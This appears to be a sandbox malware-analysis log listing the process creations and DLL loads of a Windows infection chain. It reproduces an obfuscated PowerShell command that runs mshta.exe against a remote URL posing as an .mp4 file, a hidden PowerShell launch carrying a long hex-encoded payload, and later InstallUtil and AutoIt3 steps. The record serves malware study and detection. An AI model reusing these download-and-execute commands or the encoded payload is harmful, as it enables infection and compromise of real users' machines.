                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\47891652\updater.exe "C:\Users\user\AppData\Local\Temp\47891652\updater.exe" C:\Users\user\AppData\Local\Temp\47891652\bovZdOEN.bin
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: unknownProcess created: C:\ahdccea\AutoIt3.exe "C:\ahdccea\AutoIt3.exe" C:\ahdccea\bdbhbhc.a3x
                    Source: C:\ahdccea\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: unknownProcess created: C:\ahdccea\AutoIt3.exe "C:\ahdccea\AutoIt3.exe" C:\ahdccea\bdbhbhc.a3x
                    Source: C:\ahdccea\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\47891652\updater.exe "C:\Users\user\AppData\Local\Temp\47891652\updater.exe" C:\Users\user\AppData\Local\Temp\47891652\bovZdOEN.bin Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
